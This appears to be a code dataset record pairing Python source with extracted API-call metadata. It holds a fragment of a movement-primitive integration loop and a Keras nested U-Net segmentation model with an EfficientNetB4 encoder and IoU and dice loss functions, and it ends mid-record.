dt = int_dt
if t - current_t < int_dt:
dt = t - current_t
current_t += dt
if coupling_term is not None:
cd, cdd = coupling_term.coupling(current_y, current_yd)
else:
cd, cdd = np.zeros_like(current_y), np.zeros_like(current_y)
if coupling_term_precomputed is not None:
cd += coupling_term_precomputed[0]
cdd += coupling_term_precomputed[1]
f = forcing_term(current_t).squeeze()
g, gd, gdd = apply_constraints(current_t, goal_y, goal_t, coefficients)
coupling_sum = cdd + p_gain * tracking_error / dt
ydd = (alpha_y * (beta_y * (g - current_y)
+ execution_time * gd
- execution_time * current_yd)
+ gdd * execution_time ** 2
+ f + coupling_sum) / execution_time ** 2
current_yd += dt * ydd + cd / execution_time
current_y += dt * current_yd
|
[
"numpy.zeros_like",
"numpy.copy",
"numpy.empty_like",
"numpy.finfo",
"numpy.diff",
"numpy.array",
"numpy.dot",
"numpy.linalg.solve",
"numpy.vstack"
] |
[((5868, 6113), 'numpy.array', 'np.array', (['[[1, t0, t02, t03, t04, t05], [0, 1, 2 * t0, 3 * t02, 4 * t03, 5 * t04], [0,\n 0, 2, 6 * t0, 12 * t02, 20 * t03], [1, t1, t12, t13, t14, t15], [0, 1, \n 2 * t1, 3 * t12, 4 * t13, 5 * t14], [0, 0, 2, 6 * t1, 12 * t12, 20 * t13]]'], {}), '([[1, t0, t02, t03, t04, t05], [0, 1, 2 * t0, 3 * t02, 4 * t03, 5 *\n t04], [0, 0, 2, 6 * t0, 12 * t02, 20 * t03], [1, t1, t12, t13, t14, t15\n ], [0, 1, 2 * t1, 3 * t12, 4 * t13, 5 * t14], [0, 0, 2, 6 * t1, 12 *\n t12, 20 * t13]])\n', (5876, 6113), True, 'import numpy as np\n'), ((6199, 6240), 'numpy.vstack', 'np.vstack', (['(y0, y0d, y0dd, y1, y1d, y1dd)'], {}), '((y0, y0d, y0dd, y1, y1d, y1dd))\n', (6208, 6240), True, 'import numpy as np\n'), ((6296, 6317), 'numpy.linalg.solve', 'np.linalg.solve', (['M', 'Y'], {}), '(M, Y)\n', (6311, 6317), True, 'import numpy as np\n'), ((8248, 8258), 'numpy.diff', 'np.diff', (['T'], {}), '(T)\n', (8255, 8258), True, 'import numpy as np\n'), ((8269, 8285), 'numpy.empty_like', 'np.empty_like', (['Y'], {}), '(Y)\n', (8282, 8285), True, 'import numpy as np\n'), ((8383, 8399), 'numpy.empty_like', 'np.empty_like', (['Y'], {}), '(Y)\n', (8396, 8399), True, 'import numpy as np\n'), ((6851, 6883), 'numpy.array', 'np.array', (['[1, t, t2, t3, t4, t5]'], {}), '([1, t, t2, t3, t4, t5])\n', (6859, 6883), True, 'import numpy as np\n'), ((6898, 6945), 'numpy.array', 'np.array', (['[0, 1, 2 * t, 3 * t2, 4 * t3, 5 * t4]'], {}), '([0, 1, 2 * t, 3 * t2, 4 * t3, 5 * t4])\n', (6906, 6945), True, 'import numpy as np\n'), ((6960, 7004), 'numpy.array', 'np.array', (['[0, 0, 2, 6 * t, 12 * t2, 20 * t3]'], {}), '([0, 0, 2, 6 * t, 12 * t2, 20 * t3])\n', (6968, 7004), True, 'import numpy as np\n'), ((7018, 7043), 'numpy.dot', 'np.dot', (['pos', 'coefficients'], {}), '(pos, coefficients)\n', (7024, 7043), True, 'import numpy as np\n'), ((7057, 7082), 'numpy.dot', 'np.dot', (['vel', 'coefficients'], {}), '(vel, coefficients)\n', (7063, 7082), True, 'import numpy as np\n'), ((7097, 7122), 'numpy.dot', 'np.dot', (['acc', 'coefficients'], {}), '(acc, coefficients)\n', (7103, 7122), True, 'import numpy as np\n'), ((2844, 2865), 'numpy.copy', 'np.copy', (['self.start_y'], {}), '(self.start_y)\n', (2851, 2865), True, 'import numpy as np\n'), ((2896, 2918), 'numpy.copy', 'np.copy', (['self.start_yd'], {}), '(self.start_yd)\n', (2903, 2918), True, 'import numpy as np\n'), ((3578, 3601), 'numpy.copy', 'np.copy', (['self.current_y'], {}), '(self.current_y)\n', (3585, 3601), True, 'import numpy as np\n'), ((3603, 3627), 'numpy.copy', 'np.copy', (['self.current_yd'], {}), '(self.current_yd)\n', (3610, 3627), True, 'import numpy as np\n'), ((6703, 6724), 'numpy.zeros_like', 'np.zeros_like', (['goal_y'], {}), '(goal_y)\n', (6716, 6724), True, 'import numpy as np\n'), ((6726, 6747), 'numpy.zeros_like', 'np.zeros_like', (['goal_y'], {}), '(goal_y)\n', (6739, 6747), True, 'import numpy as np\n'), ((8350, 8366), 'numpy.diff', 'np.diff', (['Y[:, d]'], {}), '(Y[:, d])\n', (8357, 8366), True, 'import numpy as np\n'), ((8466, 8483), 'numpy.diff', 'np.diff', (['Yd[:, d]'], {}), '(Yd[:, d])\n', (8473, 8483), True, 'import numpy as np\n'), ((11050, 11066), 'numpy.copy', 'np.copy', (['start_y'], {}), '(start_y)\n', (11057, 11066), True, 'import numpy as np\n'), ((11068, 11085), 'numpy.copy', 'np.copy', (['start_yd'], {}), '(start_yd)\n', (11075, 11085), True, 'import numpy as np\n'), ((11087, 11105), 'numpy.copy', 'np.copy', (['start_ydd'], {}), '(start_ydd)\n', (11094, 11105), True, 'import numpy as np\n'), ((6409, 6424), 'numpy.finfo', 'np.finfo', (['float'], {}), '(float)\n', (6417, 6424), True, 'import numpy as np\n'), ((11576, 11600), 'numpy.zeros_like', 'np.zeros_like', (['current_y'], {}), '(current_y)\n', (11589, 11600), True, 'import numpy as np\n'), ((11602, 11626), 'numpy.zeros_like', 'np.zeros_like', (['current_y'], {}), '(current_y)\n', (11615, 11626), True, 'import numpy as np\n')]
|
## https://www.kaggle.com/meaninglesslives/nested-unet-with-efficientnet-encoder
import tensorflow as tf
from tensorflow import keras
#from efficientnet import EfficientNetB4
from efficientnet.tfkeras import EfficientNetB4
import numpy as np
def convolution_block(x, filters, size, strides=(1,1), padding='same', activation=True):
x = keras.layers.Conv2D(filters, size, strides=strides, padding=padding)(x)
x = keras.layers.BatchNormalization()(x)
if activation == True:
x = keras.layers.LeakyReLU(alpha=0.1)(x)
return x
def residual_block(blockInput, num_filters=16):
x = keras.layers.LeakyReLU(alpha=0.1)(blockInput)
x = keras.layers.BatchNormalization()(x)
blockInput = keras.layers.BatchNormalization()(blockInput)
x = convolution_block(x, num_filters, (3,3) )
x = convolution_block(x, num_filters, (3,3), activation=False)
x = keras.layers.Add()([x, blockInput])
return x
def UEfficientNetB4(input_shape=(256, 256, 3), dropout_rate=0.5,imagenet_weights='imagenet'):
backbone = EfficientNetB4(weights=imagenet_weights,include_top=False,input_shape=input_shape)
input = backbone.input
start_neurons = 8
conv4 = backbone.layers[342].output
conv4 = keras.layers.LeakyReLU(alpha=0.1)(conv4)
pool4 = keras.layers.MaxPooling2D((2, 2))(conv4)
pool4 = keras.layers.Dropout(dropout_rate)(pool4)
# Middle
convm = keras.layers.Conv2D(start_neurons * 32, (3, 3), activation=None, padding="same", name='conv_middle')(pool4)
convm = residual_block(convm, start_neurons * 32)
convm = residual_block(convm, start_neurons * 32)
convm = keras.layers.LeakyReLU(alpha=0.1)(convm)
deconv4 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(convm)
deconv4_up1 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(deconv4)
deconv4_up2 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(deconv4_up1)
deconv4_up3 = keras.layers.Conv2DTranspose(start_neurons * 16, (3, 3), strides=(2, 2), padding="same")(deconv4_up2)
uconv4 = keras.layers.concatenate([deconv4, conv4])
uconv4 = keras.layers.Dropout(dropout_rate)(uconv4)
uconv4 = keras.layers.Conv2D(start_neurons * 16, (3, 3), activation=None, padding="same")(uconv4)
uconv4 = residual_block(uconv4, start_neurons * 16)
# uconv4 = residual_block(uconv4,start_neurons * 16)
uconv4 = keras.layers.LeakyReLU(alpha=0.1)(uconv4) # conv1_2
deconv3 = keras.layers.Conv2DTranspose(start_neurons * 8, (3, 3), strides=(2, 2), padding="same")(uconv4)
deconv3_up1 = keras.layers.Conv2DTranspose(start_neurons * 8, (3, 3), strides=(2, 2), padding="same")(deconv3)
deconv3_up2 = keras.layers.Conv2DTranspose(start_neurons * 8, (3, 3), strides=(2, 2), padding="same")(deconv3_up1)
conv3 = backbone.layers[154].output
uconv3 = keras.layers.concatenate([deconv3, deconv4_up1, conv3])
uconv3 = keras.layers.Dropout(dropout_rate)(uconv3)
uconv3 = keras.layers.Conv2D(start_neurons * 8, (3, 3), activation=None, padding="same")(uconv3)
uconv3 = residual_block(uconv3, start_neurons * 8)
# uconv3 = residual_block(uconv3,start_neurons * 8)
uconv3 = keras.layers.LeakyReLU(alpha=0.1)(uconv3)
deconv2 = keras.layers.Conv2DTranspose(start_neurons * 4, (3, 3), strides=(2, 2), padding="same")(uconv3)
deconv2_up1 = keras.layers.Conv2DTranspose(start_neurons * 4, (3, 3), strides=(2, 2), padding="same")(deconv2)
conv2 = backbone.layers[89].output #92=>89
uconv2 = keras.layers.concatenate([deconv2, deconv3_up1, deconv4_up2, conv2])
uconv2 = keras.layers.Dropout(0.1)(uconv2)
uconv2 = keras.layers.Conv2D(start_neurons * 4, (3, 3), activation=None, padding="same")(uconv2)
uconv2 = residual_block(uconv2, start_neurons * 4)
# uconv2 = residual_block(uconv2,start_neurons * 4)
uconv2 = keras.layers.LeakyReLU(alpha=0.1)(uconv2)
deconv1 = keras.layers.Conv2DTranspose(start_neurons * 2, (3, 3), strides=(2, 2), padding="same")(uconv2)
conv1 = backbone.layers[30].output
uconv1 = keras.layers.concatenate([deconv1, deconv2_up1, deconv3_up2, deconv4_up3, conv1])
uconv1 = keras.layers.Dropout(0.1)(uconv1)
uconv1 = keras.layers.Conv2D(start_neurons * 2, (3, 3), activation=None, padding="same")(uconv1)
uconv1 = residual_block(uconv1, start_neurons * 2)
# uconv1 = residual_block(uconv1,start_neurons * 2)
uconv1 = keras.layers.LeakyReLU(alpha=0.1)(uconv1)
uconv0 = keras.layers.Conv2DTranspose(start_neurons * 1, (3, 3), strides=(2, 2), padding="same")(uconv1)
uconv0 = keras.layers.Dropout(0.1)(uconv0)
uconv0 = keras.layers.Conv2D(start_neurons * 1, (3, 3), activation=None, padding="same")(uconv0)
uconv0 = residual_block(uconv0, start_neurons * 1)
# uconv0 = residual_block(uconv0,start_neurons * 1)
uconv0 = keras.layers.LeakyReLU(alpha=0.1)(uconv0)
uconv0 = keras.layers.Dropout(dropout_rate / 2)(uconv0)
d1=keras.layers.UpSampling2D(size=(2,2))(uconv0)
d1 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d1)
d11=keras.layers.Activation('sigmoid',name='d1')(d1)
d2 = keras.layers.UpSampling2D(size=(4, 4))(uconv1)
d2 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d2)
d22 = keras.layers.Activation('sigmoid', name='d2')(d2)
d3 = keras.layers.UpSampling2D(size=(8, 8))(uconv2)
d3 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d3)
d33 = keras.layers.Activation('sigmoid', name='d3')(d3)
d4 = keras.layers.UpSampling2D(size=(16, 16))(uconv3)
d4 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d4)
d44 = keras.layers.Activation('sigmoid', name='d4')(d4)
d5 = keras.layers.UpSampling2D(size=(32, 32))(uconv4)
d5 = keras.layers.Conv2D(1, (3, 3), padding="same", activation=None, use_bias=False)(d5)
d55 = keras.layers.Activation('sigmoid', name='d5')(d5)
d = keras.layers.concatenate([d1, d2, d3, d4, d5,input])
d = keras.layers.Conv2D(1, kernel_size=3, activation=None, padding='same', use_bias=False)(d)
d = keras.layers.Activation('sigmoid', name='d')(d)
model = keras.models.Model(inputs=input,outputs=[d,d11,d22,d33,d44,d55])
#model.name = 'u-xception'
'''
Total params: 10,501,068
Trainable params: 10,435,420
Non-trainable params: 65,648
'''
return model
def get_iou_vector(A, B):
# Numpy version
batch_size = A.shape[0]
metric = 0.0
for batch in range(batch_size):
t, p = A[batch], B[batch]
true = np.sum(t)
pred = np.sum(p)
# deal with empty mask first
if true == 0:
metric += (pred == 0)
continue
# non empty mask case. Union is never empty
# hence it is safe to divide by its number of pixels
intersection = np.sum(t * p)
union = true + pred - intersection
iou = intersection / union
# iou metrric is a stepwise approximation of the real iou over 0.5
iou = np.floor(max(0, (iou - 0.45) * 20)) / 10
metric += iou
# teake the average over all images in batch
metric /= batch_size
return metric
##
def IOU(label, pred):
# Tensorflow version
return tf.py_function (get_iou_vector, [label, pred > 0.5], tf.float64)
def dice_loss(y_true, y_pred):
smooth = 1.
y_true_f = keras.backend.flatten(y_true)
y_pred_f = keras.backend.flatten(y_pred)
intersection = y_true_f * y_pred_f
score = (2. * keras.backend.sum(intersection) + smooth) / (keras.backend.sum(y_true_f) + keras.backend.sum(y_pred_f) + smooth)
return 1. - score
##
def bce_dice_loss(y_true, y_pred):
return keras.losses.binary_crossentropy(y_true, y_pred) + dice_loss(y_true, y_pred)
def bce_logdice_loss(y_true, y_pred):
return keras.losses.binary_crossentropy(y_true, y_pred) - keras.backend.log(1. - dice_loss(y_true, y_pred))
#import tensorflow_addons as tfa
#tfa.losses.GIoULoss
|
[
"tensorflow.py_function",
"tensorflow.keras.losses.binary_crossentropy",
"tensorflow.keras.backend.sum",
"efficientnet.tfkeras.EfficientNetB4",
"tensorflow.keras.backend.flatten",
"tensorflow.keras.layers.Conv2D",
"tensorflow.keras.layers.BatchNormalization",
"tensorflow.keras.layers.MaxPooling2D",
"tensorflow.keras.layers.Dropout",
"numpy.sum",
"tensorflow.keras.models.Model",
"tensorflow.keras.layers.LeakyReLU",
"tensorflow.keras.layers.concatenate",
"tensorflow.keras.layers.Activation",
"tensorflow.keras.layers.Conv2DTranspose",
"tensorflow.keras.layers.UpSampling2D",
"tensorflow.keras.layers.Add"
] |
[((1071, 1160), 'efficientnet.tfkeras.EfficientNetB4', 'EfficientNetB4', ([], {'weights': 'imagenet_weights', 'include_top': '(False)', 'input_shape': 'input_shape'}), '(weights=imagenet_weights, include_top=False, input_shape=\n input_shape)\n', (1085, 1160), False, 'from efficientnet.tfkeras import EfficientNetB4\n'), ((2198, 2240), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv4, conv4]'], {}), '([deconv4, conv4])\n', (2222, 2240), False, 'from tensorflow import keras\n'), ((2993, 3048), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv3, deconv4_up1, conv3]'], {}), '([deconv3, deconv4_up1, conv3])\n', (3017, 3048), False, 'from tensorflow import keras\n'), ((3674, 3742), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv2, deconv3_up1, deconv4_up2, conv2]'], {}), '([deconv2, deconv3_up1, deconv4_up2, conv2])\n', (3698, 3742), False, 'from tensorflow import keras\n'), ((4235, 4320), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[deconv1, deconv2_up1, deconv3_up2, deconv4_up3, conv1]'], {}), '([deconv1, deconv2_up1, deconv3_up2, deconv4_up3,\n conv1])\n', (4259, 4320), False, 'from tensorflow import keras\n'), ((6217, 6270), 'tensorflow.keras.layers.concatenate', 'keras.layers.concatenate', (['[d1, d2, d3, d4, d5, input]'], {}), '([d1, d2, d3, d4, d5, input])\n', (6241, 6270), False, 'from tensorflow import keras\n'), ((6439, 6509), 'tensorflow.keras.models.Model', 'keras.models.Model', ([], {'inputs': 'input', 'outputs': '[d, d11, d22, d33, d44, d55]'}), '(inputs=input, outputs=[d, d11, d22, d33, d44, d55])\n', (6457, 6509), False, 'from tensorflow import keras\n'), ((7572, 7635), 'tensorflow.py_function', 'tf.py_function', (['get_iou_vector', '[label, pred > 0.5]', 'tf.float64'], {}), '(get_iou_vector, [label, pred > 0.5], tf.float64)\n', (7586, 7635), True, 'import tensorflow as tf\n'), ((7706, 7735), 'tensorflow.keras.backend.flatten', 'keras.backend.flatten', (['y_true'], {}), '(y_true)\n', (7727, 7735), False, 'from tensorflow import keras\n'), ((7752, 7781), 'tensorflow.keras.backend.flatten', 'keras.backend.flatten', (['y_pred'], {}), '(y_pred)\n', (7773, 7781), False, 'from tensorflow import keras\n'), ((352, 420), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['filters', 'size'], {'strides': 'strides', 'padding': 'padding'}), '(filters, size, strides=strides, padding=padding)\n', (371, 420), False, 'from tensorflow import keras\n'), ((433, 466), 'tensorflow.keras.layers.BatchNormalization', 'keras.layers.BatchNormalization', ([], {}), '()\n', (464, 466), False, 'from tensorflow import keras\n'), ((622, 655), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (644, 655), False, 'from tensorflow import keras\n'), ((677, 710), 'tensorflow.keras.layers.BatchNormalization', 'keras.layers.BatchNormalization', ([], {}), '()\n', (708, 710), False, 'from tensorflow import keras\n'), ((732, 765), 'tensorflow.keras.layers.BatchNormalization', 'keras.layers.BatchNormalization', ([], {}), '()\n', (763, 765), False, 'from tensorflow import keras\n'), ((906, 924), 'tensorflow.keras.layers.Add', 'keras.layers.Add', ([], {}), '()\n', (922, 924), False, 'from tensorflow import keras\n'), ((1261, 1294), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (1283, 1294), False, 'from tensorflow import keras\n'), ((1315, 1348), 'tensorflow.keras.layers.MaxPooling2D', 'keras.layers.MaxPooling2D', (['(2, 2)'], {}), '((2, 2))\n', (1340, 1348), False, 'from tensorflow import keras\n'), ((1369, 1403), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['dropout_rate'], {}), '(dropout_rate)\n', (1389, 1403), False, 'from tensorflow import keras\n'), ((1440, 1545), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 32)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""', 'name': '"""conv_middle"""'}), "(start_neurons * 32, (3, 3), activation=None, padding=\n 'same', name='conv_middle')\n", (1459, 1545), False, 'from tensorflow import keras\n'), ((1671, 1704), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (1693, 1704), False, 'from tensorflow import keras\n'), ((1729, 1821), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (1757, 1821), False, 'from tensorflow import keras\n'), ((1844, 1936), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (1872, 1936), False, 'from tensorflow import keras\n'), ((1961, 2053), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (1989, 2053), False, 'from tensorflow import keras\n'), ((2082, 2174), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 16)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), strides=(2, 2),\n padding='same')\n", (2110, 2174), False, 'from tensorflow import keras\n'), ((2255, 2289), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['dropout_rate'], {}), '(dropout_rate)\n', (2275, 2289), False, 'from tensorflow import keras\n'), ((2314, 2399), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 16)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 16, (3, 3), activation=None, padding='same'\n )\n", (2333, 2399), False, 'from tensorflow import keras\n'), ((2536, 2569), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (2558, 2569), False, 'from tensorflow import keras\n'), ((2606, 2697), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 8)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), strides=(2, 2),\n padding='same')\n", (2634, 2697), False, 'from tensorflow import keras\n'), ((2721, 2812), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 8)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), strides=(2, 2),\n padding='same')\n", (2749, 2812), False, 'from tensorflow import keras\n'), ((2837, 2928), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 8)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), strides=(2, 2),\n padding='same')\n", (2865, 2928), False, 'from tensorflow import keras\n'), ((3063, 3097), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['dropout_rate'], {}), '(dropout_rate)\n', (3083, 3097), False, 'from tensorflow import keras\n'), ((3122, 3201), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 8)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 8, (3, 3), activation=None, padding='same')\n", (3141, 3201), False, 'from tensorflow import keras\n'), ((3341, 3374), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (3363, 3374), False, 'from tensorflow import keras\n'), ((3400, 3491), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 4)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 4, (3, 3), strides=(2, 2),\n padding='same')\n", (3428, 3491), False, 'from tensorflow import keras\n'), ((3515, 3606), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 4)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 4, (3, 3), strides=(2, 2),\n padding='same')\n", (3543, 3606), False, 'from tensorflow import keras\n'), ((3759, 3784), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.1)'], {}), '(0.1)\n', (3779, 3784), False, 'from tensorflow import keras\n'), ((3807, 3886), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 4)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 4, (3, 3), activation=None, padding='same')\n", (3826, 3886), False, 'from tensorflow import keras\n'), ((4026, 4059), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (4048, 4059), False, 'from tensorflow import keras\n'), ((4085, 4176), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 2)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 2, (3, 3), strides=(2, 2),\n padding='same')\n", (4113, 4176), False, 'from tensorflow import keras\n'), ((4333, 4358), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.1)'], {}), '(0.1)\n', (4353, 4358), False, 'from tensorflow import keras\n'), ((4381, 4460), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 2)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 2, (3, 3), activation=None, padding='same')\n", (4400, 4460), False, 'from tensorflow import keras\n'), ((4600, 4633), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (4622, 4633), False, 'from tensorflow import keras\n'), ((4658, 4749), 'tensorflow.keras.layers.Conv2DTranspose', 'keras.layers.Conv2DTranspose', (['(start_neurons * 1)', '(3, 3)'], {'strides': '(2, 2)', 'padding': '"""same"""'}), "(start_neurons * 1, (3, 3), strides=(2, 2),\n padding='same')\n", (4686, 4749), False, 'from tensorflow import keras\n'), ((4768, 4793), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(0.1)'], {}), '(0.1)\n', (4788, 4793), False, 'from tensorflow import keras\n'), ((4816, 4895), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(start_neurons * 1)', '(3, 3)'], {'activation': 'None', 'padding': '"""same"""'}), "(start_neurons * 1, (3, 3), activation=None, padding='same')\n", (4835, 4895), False, 'from tensorflow import keras\n'), ((5035, 5068), 'tensorflow.keras.layers.LeakyReLU', 'keras.layers.LeakyReLU', ([], {'alpha': '(0.1)'}), '(alpha=0.1)\n', (5057, 5068), False, 'from tensorflow import keras\n'), ((5091, 5129), 'tensorflow.keras.layers.Dropout', 'keras.layers.Dropout', (['(dropout_rate / 2)'], {}), '(dropout_rate / 2)\n', (5111, 5129), False, 'from tensorflow import keras\n'), ((5148, 5186), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(2, 2)'}), '(size=(2, 2))\n', (5173, 5186), False, 'from tensorflow import keras\n'), ((5204, 5283), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5223, 5283), False, 'from tensorflow import keras\n'), ((5297, 5342), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d1"""'}), "('sigmoid', name='d1')\n", (5320, 5342), False, 'from tensorflow import keras\n'), ((5358, 5396), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(4, 4)'}), '(size=(4, 4))\n', (5383, 5396), False, 'from tensorflow import keras\n'), ((5415, 5494), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5434, 5494), False, 'from tensorflow import keras\n'), ((5510, 5555), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d2"""'}), "('sigmoid', name='d2')\n", (5533, 5555), False, 'from tensorflow import keras\n'), ((5572, 5610), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(8, 8)'}), '(size=(8, 8))\n', (5597, 5610), False, 'from tensorflow import keras\n'), ((5629, 5708), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5648, 5708), False, 'from tensorflow import keras\n'), ((5724, 5769), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d3"""'}), "('sigmoid', name='d3')\n", (5747, 5769), False, 'from tensorflow import keras\n'), ((5786, 5826), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(16, 16)'}), '(size=(16, 16))\n', (5811, 5826), False, 'from tensorflow import keras\n'), ((5845, 5924), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (5864, 5924), False, 'from tensorflow import keras\n'), ((5940, 5985), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d4"""'}), "('sigmoid', name='d4')\n", (5963, 5985), False, 'from tensorflow import keras\n'), ((6002, 6042), 'tensorflow.keras.layers.UpSampling2D', 'keras.layers.UpSampling2D', ([], {'size': '(32, 32)'}), '(size=(32, 32))\n', (6027, 6042), False, 'from tensorflow import keras\n'), ((6061, 6140), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)', '(3, 3)'], {'padding': '"""same"""', 'activation': 'None', 'use_bias': '(False)'}), "(1, (3, 3), padding='same', activation=None, use_bias=False)\n", (6080, 6140), False, 'from tensorflow import keras\n'), ((6156, 6201), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d5"""'}), "('sigmoid', name='d5')\n", (6179, 6201), False, 'from tensorflow import keras\n'), ((6279, 6369), 'tensorflow.keras.layers.Conv2D', 'keras.layers.Conv2D', (['(1)'], {'kernel_size': '(3)', 'activation': 'None', 'padding': '"""same"""', 'use_bias': '(False)'}), "(1, kernel_size=3, activation=None, padding='same',\n use_bias=False)\n", (6298, 6369), False, 'from tensorflow import keras\n'), ((6378, 6422), 'tensorflow.keras.layers.Activation', 'keras.layers.Activation', (['"""sigmoid"""'], {'name': '"""d"""'}), "('sigmoid', name='d')\n", (6401, 6422), False, 'from tensorflow import keras\n'), ((6857, 6866), 'numpy.sum', 'np.sum', (['t'], {}), '(t)\n', (6863, 6866), True, 'import numpy as np\n'), ((6883, 6892), 'numpy.sum', 'np.sum', (['p'], {}), '(p)\n', (6889, 6892), True, 'import numpy as np\n'), ((7155, 